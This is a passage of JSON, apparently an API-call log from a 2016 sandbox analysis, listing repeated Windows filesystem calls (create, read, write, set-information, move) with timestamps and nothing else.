"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,257", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,267", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,267", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,267", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,267", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,277", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,277", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,277", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,277", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,277", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,287", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,287", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,287", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,287", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,287", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,287", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,287", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,287", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,297", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,297", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,297", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,297", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,297", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,297", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,297", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,297", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,307", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,307", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,307", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,307", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,307", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,307", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,307", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,307", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,318", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,328", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,328", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,338", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,348", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,348", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,358", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,358", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,368", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,368", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,378", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,378", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,378", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,388", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,388", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,388", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,398", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,398", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,398", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,408", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,408", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,408", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,418", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,418", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,418", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,428", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,428", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,428", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,428", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,438", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,438", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,438", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,438", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,448", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,458", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,458", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,468", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,478", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,478", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,478", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,488", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,488", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,488", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,498", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,498", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,498", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,508", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,508", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,508", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,508", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,518", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,518", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,518", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,518", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,528", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,538", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,538", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,538", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,548", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,548", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,548", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,558", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,558", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,558", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,558", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,558", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,558", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,558", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,568", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,578", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,578", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,588", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,598", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,598", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,598", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,608", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,608", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,608", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,618", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,618", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,628", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,628", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,638", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,638", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,638", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,648", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,648", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,648", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,658", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,658", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,658", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,668", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,668", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,668", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,668", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,678", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,678", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,678", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,678", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,678", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,678", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,678", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,688", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,688", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,688", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,688", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,688", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,688", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,708", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,708", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,708", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,708", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,708", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,718", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,718", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,718", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,718", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,718", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,718", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,718", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,718", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,728", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,728", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,738", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,738", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,748", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,758", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,758", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,758", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,768", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,768", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,768", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,768", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,768", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,768", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,768", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,778", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,778", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,778", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,778", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,788", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,788", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,788", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,788", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,788", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,788", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,788", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,788", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,788", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,798", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,808", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,808", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,818", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,828", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,828", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,828", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,828", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,828", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,828", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,828", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,838", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,838", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,838", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,838", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,848", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,848", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,848", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,848", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,848", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,848", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,848", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,848", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,848", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,848", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,848", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,858", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,858", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,858", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,858", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,858", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,858", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,858", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,858", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,868", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,868", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,868", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,868", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,868", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,868", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,868", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,868", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,868", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,878", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,878", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,878", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,878", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,878", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,878", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,878", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,878", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,878", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,888", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,888", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,888", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,888", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,888", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,888", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,888", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,888", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,888", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,898", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,898", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,898", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,898", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,898", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,898", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,898", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,908", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,908", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,908", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,908", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,908", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,908", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,908", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,908", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,908", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,918", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,918", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,918", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,918", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,918", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,918", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,918", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,918", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,928", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,928", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,928", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,928", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,928", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,928", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,928", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,928", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,938", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,938", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,938", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,938", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,938", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,938", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,938", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,938", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,938", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,948", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,948", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,948", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,948", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,948", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,948", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,948", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,948", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,948", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,958", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,958", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,958", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,958", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,958", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,958", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,958", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,958", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,958", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,968", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,968", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,968", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,968", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,968", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,968", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,968", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,968", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,968", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,978", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,978", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,978", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,978", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,978", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,978", "api": "NtSetInformationFile"}, {"category": 